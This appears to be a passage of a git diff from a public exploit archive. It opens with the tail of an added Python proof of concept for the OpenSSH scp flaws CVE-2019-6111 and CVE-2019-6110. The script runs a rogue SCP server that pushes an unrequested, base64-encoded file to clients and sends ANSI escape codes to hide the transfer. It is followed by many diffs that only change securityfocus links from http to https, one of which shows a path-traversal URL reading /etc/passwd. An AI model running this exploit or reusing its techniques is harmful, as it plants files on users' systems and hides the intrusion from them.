SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w. + Are you sure you want to continue connecting (yes/no)? yes + Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. + foo@localhost's password: + test.txt 100% 32 0.7KB/s 00:00 + +The file you requested (e.g. test.txt) will be saved in your current directory. +If your client is vulnerable, you will have an additional file "exploit.txt" +created in your current directory. + + $ cat test.txt + This is the file you requested. + $ cat exploit.txt + SSHtranger Things + +The interesting code is in ScpServer.send_file(). +''' +import base64 +import gzip +import logging +import paramiko +import paramiko.rsakey +import socket +import threading + +logging.basicConfig(level=logging.INFO) + +dummy = 'This is the file you requested.\n' +payload = gzip.decompress(base64.b64decode( + b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46' + b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA' + b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7' + b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d' + b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM' + b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz' + b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4' + b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc' + b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS' + b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA' +)) + +class ScpServer(paramiko.ServerInterface): + def __init__(self): + self.event = threading.Event() + + def check_auth_password(self, username, password): + logging.info('Authenticated with %s:%s', username, password) + return paramiko.AUTH_SUCCESSFUL + + def check_channel_request(self, kind, chanid): + logging.info('Opened session channel %d', chanid) + if kind == "session": + return paramiko.OPEN_SUCCEEDED + return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED + + def check_channel_exec_request(self, channel, command): + command = command.decode('ascii') + logging.info('Approving exec request: %s', command) + parts = command.split(' ') + # Make sure that this is a request to get a file: + assert parts[0] == 'scp' + assert '-f' in parts + file = parts[-1] + # Send file from a new thread. + threading.Thread(target=self.send_file, args=(channel, file)).start() + return True + + def send_file(self, channel, file): + ''' + The meat of the exploit: + 1. Send the requested file. + 2. Send another file (exploit.txt) that was not requested. + 3. Print ANSI escape sequences to stderr to hide the transfer of + exploit.txt. + ''' + def wait_ok(): + assert channel.recv(1024) == b'\x00' + def send_ok(): + channel.sendall(b'\x00') + + wait_ok() + + logging.info('Sending requested file "%s" to channel %d', file, + channel.get_id()) + command = 'C0664 {} {}\n'.format(len(dummy), file).encode('ascii') + channel.sendall(command) + wait_ok() + channel.sendall(dummy) + send_ok() + wait_ok() + + # This is CVE-2019-6111: whatever file the client requested, we send + # them 'exploit.txt' instead. + logging.info('Sending malicious file "exploit.txt" to channel %d', + channel.get_id()) + command = 'C0664 {} exploit.txt\n'.format(len(payload)).encode('ascii') + channel.sendall(command) + wait_ok() + channel.sendall(payload) + send_ok() + wait_ok() + + # This is CVE-2019-6110: the client will display the text that we send + # to stderr, even if it contains ANSI escape sequences. We can send + # ANSI codes that clear the current line to hide the fact that a second + # file was transmitted.. + logging.info('Covering our tracks by sending ANSI escape sequence') + channel.sendall_stderr("\x1b[1A".encode('ascii')) + channel.close() + +def main(): + logging.info('Creating a temporary RSA host key...') + host_key = paramiko.rsakey.RSAKey.generate(1024) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('localhost', 2222)) + sock.listen(0) + logging.info('Listening on port 2222...') + + while True: + client, addr = sock.accept() + logging.info('Received connection from %s:%s', *addr) + transport = paramiko.Transport(client) + transport.add_server_key(host_key) + server = ScpServer() + transport.start_server(server=server) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/4673.rb b/exploits/multiple/remote/4673.rb index 5ebc7fecc..da4277231 100755 --- a/exploits/multiple/remote/4673.rb +++ b/exploits/multiple/remote/4673.rb @@ -6,7 +6,7 @@ # http://www.milw0rm.com/exploits/4651 (recent Microsoft Windows exploit) # From Metasploit: apple_quicktime_rtsp_response.rb (by MC and HD Moore) # http://nvd.nist.gov/nvd.cfm?cvename=CVE-2002-0252 -# BID: http://www.securityfocus.com/bid/26549 +# BID: https://www.securityfocus.com/bid/26549 # # Notes: # Payload badchars: \x00 \x09 \x0a \x0d \x20 \x22 \x25 \x26 \x27 \x2b \x2f diff --git a/exploits/multiple/remote/9993.txt b/exploits/multiple/remote/9993.txt index f6d55d432..0ebc79d54 100644 --- a/exploits/multiple/remote/9993.txt +++ b/exploits/multiple/remote/9993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34383/info +source: https://www.securityfocus.com/bid/34383/info The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/11403.txt b/exploits/multiple/webapps/11403.txt index 9103e539a..73bfef604 100644 --- a/exploits/multiple/webapps/11403.txt +++ b/exploits/multiple/webapps/11403.txt @@ -78,8 +78,8 @@ Related Public Info =================== -http://www.securityfocus.com/bid/3592/info +https://www.securityfocus.com/bid/3592/info -http://www.securityfocus.com/bid/1578/info +https://www.securityfocus.com/bid/1578/info -http://www.securityfocus.com/bid/1328/info \ No newline at end of file +https://www.securityfocus.com/bid/1328/info \ No newline at end of file diff --git a/exploits/multiple/webapps/11404.txt b/exploits/multiple/webapps/11404.txt index f3caec750..3e3413de2 100644 --- a/exploits/multiple/webapps/11404.txt +++ b/exploits/multiple/webapps/11404.txt @@ -14,7 +14,7 @@ Ref's: http://securitytracker.com/alerts/2005/May/1014077.html -http://www.securityfocus.com/bid/13817/exploit +https://www.securityfocus.com/bid/13817/exploit diff --git a/exploits/multiple/webapps/21082.txt b/exploits/multiple/webapps/21082.txt index 0a0d58648..c7f4edbc7 100644 --- a/exploits/multiple/webapps/21082.txt +++ b/exploits/multiple/webapps/21082.txt @@ -15,5 +15,5 @@ Testing environment: Sentinel Log Manager Appliance 1.2.0.1 Vulnerable URL: /novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd -BID: http://www.securityfocus.com/bid/51104/info +BID: https://www.securityfocus.com/bid/51104/info CVE-2011-5028: http://www.cvedetails.com/cve/CVE-2011-5028 \ No newline at end of file diff --git a/exploits/multiple/webapps/24573.txt b/exploits/multiple/webapps/24573.txt index 7a2bd8ec2..4683389ea 100644 --- a/exploits/multiple/webapps/24573.txt +++ b/exploits/multiple/webapps/24573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11111/info +source: https://www.securityfocus.com/bid/11111/info Keene Digital Media Server is prone to multiple cross-site scripting vulnerabilities. These issues span multiple scripts. The source of the problem is that affected scripts do not sufficiently sanitize externally supplied data before rendering it to a client user. An attacker may exploit these issues by enticing a victim user to follow a malicious link. diff --git a/exploits/multiple/webapps/24792.txt b/exploits/multiple/webapps/24792.txt index 7f5c5b5e8..919fa472b 100644 --- a/exploits/multiple/webapps/24792.txt +++ b/exploits/multiple/webapps/24792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11779/info +source: https://www.securityfocus.com/bid/11779/info IPCop is reported susceptible to an HTML injection vulnerability in its proxy log viewer. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web pages. diff --git a/exploits/multiple/webapps/28340.c b/exploits/multiple/webapps/28340.c index 6b22dce9b..759bc5469 100644 --- a/exploits/multiple/webapps/28340.c +++ b/exploits/multiple/webapps/28340.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/19333/info +source: https://www.securityfocus.com/bid/19333/info Applications running pswd.js are prone to an insecure password-hash weakness. This issue is due to a design flaw that results in password hashes being created in an insecure manner. diff --git a/exploits/multiple/webapps/31233.txt b/exploits/multiple/webapps/31233.txt index a1d2c7a25..d27913521 100644 --- a/exploits/multiple/webapps/31233.txt +++ b/exploits/multiple/webapps/31233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27875/info +source: https://www.securityfocus.com/bid/27875/info webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data. diff --git a/exploits/multiple/webapps/31234.txt b/exploits/multiple/webapps/31234.txt index 73c991ad6..5408c1000 100644 --- a/exploits/multiple/webapps/31234.txt +++ b/exploits/multiple/webapps/31234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27875/info +source: https://www.securityfocus.com/bid/27875/info webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data. diff --git a/exploits/multiple/webapps/31673.txt b/exploits/multiple/webapps/31673.txt index aab92a712..87f18614c 100644 --- a/exploits/multiple/webapps/31673.txt +++ b/exploits/multiple/webapps/31673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28848/info +source: https://www.securityfocus.com/bid/28848/info Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/webapps/32576.txt b/exploits/multiple/webapps/32576.txt index fc4e11951..21ad8480b 100644 --- a/exploits/multiple/webapps/32576.txt +++ b/exploits/multiple/webapps/32576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32233/info +source: https://www.securityfocus.com/bid/32233/info IBM Tivoli Netcool Service Quality Manager is prone to multiple cross-site scripting and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/32631.txt b/exploits/multiple/webapps/32631.txt index 204f0ee5a..4712f192a 100644 --- a/exploits/multiple/webapps/32631.txt +++ b/exploits/multiple/webapps/32631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32574/info +source: https://www.securityfocus.com/bid/32574/info IBM Rational ClearCase is prone to a cross-site scripting vulnerability because the software fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/32894.txt b/exploits/multiple/webapps/32894.txt index 1c774b13d..688e27d8c 100644 --- a/exploits/multiple/webapps/32894.txt +++ b/exploits/multiple/webapps/32894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34447/info +source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: diff --git a/exploits/multiple/webapps/32895.txt b/exploits/multiple/webapps/32895.txt index 7294573a1..7907cc987 100644 --- a/exploits/multiple/webapps/32895.txt +++ b/exploits/multiple/webapps/32895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34447/info +source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: diff --git a/exploits/multiple/webapps/32896.html b/exploits/multiple/webapps/32896.html index 031ebe03d..8d55a5d27 100644 --- a/exploits/multiple/webapps/32896.html +++ b/exploits/multiple/webapps/32896.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34447/info +source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: diff --git a/exploits/multiple/webapps/32908.txt b/exploits/multiple/webapps/32908.txt index 956a57f65..73003583b 100644 --- a/exploits/multiple/webapps/32908.txt +++ b/exploits/multiple/webapps/32908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34513/info +source: https://www.securityfocus.com/bid/34513/info IBM Tivoli Continuous Data Protection for Files is prone to a cross-site scripting vulnerability. diff --git a/exploits/multiple/webapps/33180.txt b/exploits/multiple/webapps/33180.txt index 24b056d7d..4a06458a9 100644 --- a/exploits/multiple/webapps/33180.txt +++ b/exploits/multiple/webapps/33180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36087/info +source: https://www.securityfocus.com/bid/36087/info Adobe Flex SDK is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to express-install template files. diff --git a/exploits/multiple/webapps/33284.txt b/exploits/multiple/webapps/33284.txt index 300a79731..0f0dcf931 100644 --- a/exploits/multiple/webapps/33284.txt +++ b/exploits/multiple/webapps/33284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36672/info +source: https://www.securityfocus.com/bid/36672/info Pentaho BI is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly validate user-supplied input. diff --git a/exploits/multiple/webapps/33438.txt b/exploits/multiple/webapps/33438.txt index 32ff0e592..c866cdf10 100644 --- a/exploits/multiple/webapps/33438.txt +++ b/exploits/multiple/webapps/33438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37451/info +source: https://www.securityfocus.com/bid/37451/info webMathematica is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33511.txt b/exploits/multiple/webapps/33511.txt index 96460f831..e0dbde258 100644 --- a/exploits/multiple/webapps/33511.txt +++ b/exploits/multiple/webapps/33511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37802/info +source: https://www.securityfocus.com/bid/37802/info Zenoss is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/33578.txt b/exploits/multiple/webapps/33578.txt index 6de1a60e3..9a0e6612e 100644 --- a/exploits/multiple/webapps/33578.txt +++ b/exploits/multiple/webapps/33578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37999/info +source: https://www.securityfocus.com/bid/37999/info XAMPP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/multiple/webapps/33717.txt b/exploits/multiple/webapps/33717.txt index 823d3b43e..44bffea50 100644 --- a/exploits/multiple/webapps/33717.txt +++ b/exploits/multiple/webapps/33717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38575/info +source: https://www.securityfocus.com/bid/38575/info Six Apart Vox is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33731.txt b/exploits/multiple/webapps/33731.txt index b8d17882e..af164d409 100644 --- a/exploits/multiple/webapps/33731.txt +++ b/exploits/multiple/webapps/33731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38634/info +source: https://www.securityfocus.com/bid/38634/info Friendly Technologies TR-069 ACS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/33759.txt b/exploits/multiple/webapps/33759.txt index 089c8d11b..0a4f62232 100644 --- a/exploits/multiple/webapps/33759.txt +++ b/exploits/multiple/webapps/33759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38721/info +source: https://www.securityfocus.com/bid/38721/info DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33760.txt b/exploits/multiple/webapps/33760.txt index 7ca2d7cf5..38f2b4449 100644 --- a/exploits/multiple/webapps/33760.txt +++ b/exploits/multiple/webapps/33760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38732/info +source: https://www.securityfocus.com/bid/38732/info Multiple products are prone to a cross-site scripting vulnerability because the applications fail to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33764.txt b/exploits/multiple/webapps/33764.txt index 2e8e562df..50b1f2037 100644 --- a/exploits/multiple/webapps/33764.txt +++ b/exploits/multiple/webapps/33764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38739/info +source: https://www.securityfocus.com/bid/38739/info Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/33765.txt b/exploits/multiple/webapps/33765.txt index d1b977f6c..5c55cbae1 100644 --- a/exploits/multiple/webapps/33765.txt +++ b/exploits/multiple/webapps/33765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38739/info +source: https://www.securityfocus.com/bid/38739/info Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/33937.txt b/exploits/multiple/webapps/33937.txt index 8ee95c4a4..7988e2e1a 100644 --- a/exploits/multiple/webapps/33937.txt +++ b/exploits/multiple/webapps/33937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39926/info +source: https://www.securityfocus.com/bid/39926/info TYPO3 't3m_cumulus_tagcloud' extension is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33995.txt b/exploits/multiple/webapps/33995.txt index 00e4b9efa..ad69ff8a5 100644 --- a/exploits/multiple/webapps/33995.txt +++ b/exploits/multiple/webapps/33995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40212/info +source: https://www.securityfocus.com/bid/40212/info Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34000.txt b/exploits/multiple/webapps/34000.txt index fd7a8ab9f..0726f91bd 100644 --- a/exploits/multiple/webapps/34000.txt +++ b/exploits/multiple/webapps/34000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40236/info +source: https://www.securityfocus.com/bid/40236/info Serialsystem is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34111.txt b/exploits/multiple/webapps/34111.txt index bea366b97..b9c840c8f 100644 --- a/exploits/multiple/webapps/34111.txt +++ b/exploits/multiple/webapps/34111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40676/info +source: https://www.securityfocus.com/bid/40676/info GREEZLE - Global Real Estate Agent Site is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/34136.txt b/exploits/multiple/webapps/34136.txt index 343521032..5cc072dfe 100644 --- a/exploits/multiple/webapps/34136.txt +++ b/exploits/multiple/webapps/34136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40813/info +source: https://www.securityfocus.com/bid/40813/info Plesk Server Administrator (PSA) is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34224.txt b/exploits/multiple/webapps/34224.txt index e9af10bda..c100b2f9f 100644 --- a/exploits/multiple/webapps/34224.txt +++ b/exploits/multiple/webapps/34224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41229/info +source: https://www.securityfocus.com/bid/41229/info Kryn.cms is prone to a cross-site request-forgery vulnerability and an HTML-injection vulnerability. diff --git a/exploits/multiple/webapps/34237.txt b/exploits/multiple/webapps/34237.txt index e414f949c..715e0581d 100644 --- a/exploits/multiple/webapps/34237.txt +++ b/exploits/multiple/webapps/34237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41322/info +source: https://www.securityfocus.com/bid/41322/info Xplico is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34907.txt b/exploits/multiple/webapps/34907.txt index 657b619a6..d00a00210 100644 --- a/exploits/multiple/webapps/34907.txt +++ b/exploits/multiple/webapps/34907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34908.txt b/exploits/multiple/webapps/34908.txt index c383752f2..87fb0c039 100644 --- a/exploits/multiple/webapps/34908.txt +++ b/exploits/multiple/webapps/34908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34909.txt b/exploits/multiple/webapps/34909.txt index 92b9d71d8..cdeffbc86 100644 --- a/exploits/multiple/webapps/34909.txt +++ b/exploits/multiple/webapps/34909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34910.txt b/exploits/multiple/webapps/34910.txt index c9ff7d08f..eb923e95d 100644 --- a/exploits/multiple/webapps/34910.txt +++ b/exploits/multiple/webapps/34910.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34911.txt b/exploits/multiple/webapps/34911.txt index 20754078e..2b85e85d9 100644 --- a/exploits/multiple/webapps/34911.txt +++ b/exploits/multiple/webapps/34911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34912.txt b/exploits/multiple/webapps/34912.txt index a480802db..e5fbd85c0 100644 --- a/exploits/multiple/webapps/34912.txt +++ b/exploits/multiple/webapps/34912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34913.txt b/exploits/multiple/webapps/34913.txt index b4b587c4d..6d1e6177d 100644 --- a/exploits/multiple/webapps/34913.txt +++ b/exploits/multiple/webapps/34913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34914.txt b/exploits/multiple/webapps/34914.txt index 3b770b3ee..63ff9b756 100644 --- a/exploits/multiple/webapps/34914.txt +++ b/exploits/multiple/webapps/34914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34915.txt b/exploits/multiple/webapps/34915.txt index b4c779edc..777ae9437 100644 --- a/exploits/multiple/webapps/34915.txt +++ b/exploits/multiple/webapps/34915.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34916.txt b/exploits/multiple/webapps/34916.txt index 1a5f27f3a..53e0cfae9 100644 --- a/exploits/multiple/webapps/34916.txt +++ b/exploits/multiple/webapps/34916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34917.txt b/exploits/multiple/webapps/34917.txt index ac5595301..4802f2990 100644 --- a/exploits/multiple/webapps/34917.txt +++ b/exploits/multiple/webapps/34917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/35012.txt b/exploits/multiple/webapps/35012.txt index 54fc7360c..6d52f4b1e 100644 --- a/exploits/multiple/webapps/35012.txt +++ b/exploits/multiple/webapps/35012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45027/info +source: https://www.securityfocus.com/bid/45027/info ZyXEL P-660R-T1 V2 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/35233.txt b/exploits/multiple/webapps/35233.txt index db157818a..6783525dd 100644 --- a/exploits/multiple/webapps/35233.txt +++ b/exploits/multiple/webapps/35233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45911/info +source: https://www.securityfocus.com/bid/45911/info B-Cumulus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/35743.txt b/exploits/multiple/webapps/35743.txt index 8dab38b03..2f70bf7dc 100644 --- a/exploits/multiple/webapps/35743.txt +++ b/exploits/multiple/webapps/35743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47845/info +source: https://www.securityfocus.com/bid/47845/info The Flash Tag Cloud widget and the MT-Cumulus Plugin are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/35941.txt b/exploits/multiple/webapps/35941.txt index b001bd41a..b607b982c 100644 --- a/exploits/multiple/webapps/35941.txt +++ b/exploits/multiple/webapps/35941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48651/info +source: https://www.securityfocus.com/bid/48651/info Flowplayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/webapps/37470.txt b/exploits/multiple/webapps/37470.txt index d5f9b5375..a4c22cfb4 100644 --- a/exploits/multiple/webapps/37470.txt +++ b/exploits/multiple/webapps/37470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54245/info +source: https://www.securityfocus.com/bid/54245/info SWFUpload is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/multiple/webapps/37569.txt b/exploits/multiple/webapps/37569.txt index 8db9505ee..dd3784e9a 100644 --- a/exploits/multiple/webapps/37569.txt +++ b/exploits/multiple/webapps/37569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54792/info +source: https://www.securityfocus.com/bid/54792/info ntop is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/multiple/webapps/37570.py b/exploits/multiple/webapps/37570.py index 74fc6a761..3dce26715 100755 --- a/exploits/multiple/webapps/37570.py +++ b/exploits/multiple/webapps/37570.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54793/info +source: https://www.securityfocus.com/bid/54793/info Zenoss is prone to the following security vulnerabilities: diff --git a/exploits/multiple/webapps/37571.txt b/exploits/multiple/webapps/37571.txt index 663e7f5c2..7c52f7121 100644 --- a/exploits/multiple/webapps/37571.txt +++ b/exploits/multiple/webapps/37571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54793/info +source: https://www.securityfocus.com/bid/54793/info Zenoss is prone to the following security vulnerabilities: diff --git a/exploits/multiple/webapps/37573.txt b/exploits/multiple/webapps/37573.txt index 2241bc2c6..1eb6dc0d6 100644 --- a/exploits/multiple/webapps/37573.txt +++ b/exploits/multiple/webapps/37573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54812/info +source: https://www.securityfocus.com/bid/54812/info Worksforweb iAuto is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/37791.txt b/exploits/multiple/webapps/37791.txt index 8eeaeb379..4051fc76b 100644 --- a/exploits/multiple/webapps/37791.txt +++ b/exploits/multiple/webapps/37791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55509/info +source: https://www.securityfocus.com/bid/55509/info Atlassian Confluence is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/38016.txt b/exploits/multiple/webapps/38016.txt index 0b863ff2d..a2783da84 100644 --- a/exploits/multiple/webapps/38016.txt +++ b/exploits/multiple/webapps/38016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56474/info +source: https://www.securityfocus.com/bid/56474/info ESRI ArcGIS for Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/38062.txt b/exploits/multiple/webapps/38062.txt index 64cd2030a..f8aabfcb2 100644 --- a/exploits/multiple/webapps/38062.txt +++ b/exploits/multiple/webapps/38062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56687/info +source: https://www.securityfocus.com/bid/56687/info Forescout CounterACT is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/38366.py b/exploits/multiple/webapps/38366.py index 5eb9d9a1a..6729da1fa 100755 --- a/exploits/multiple/webapps/38366.py +++ 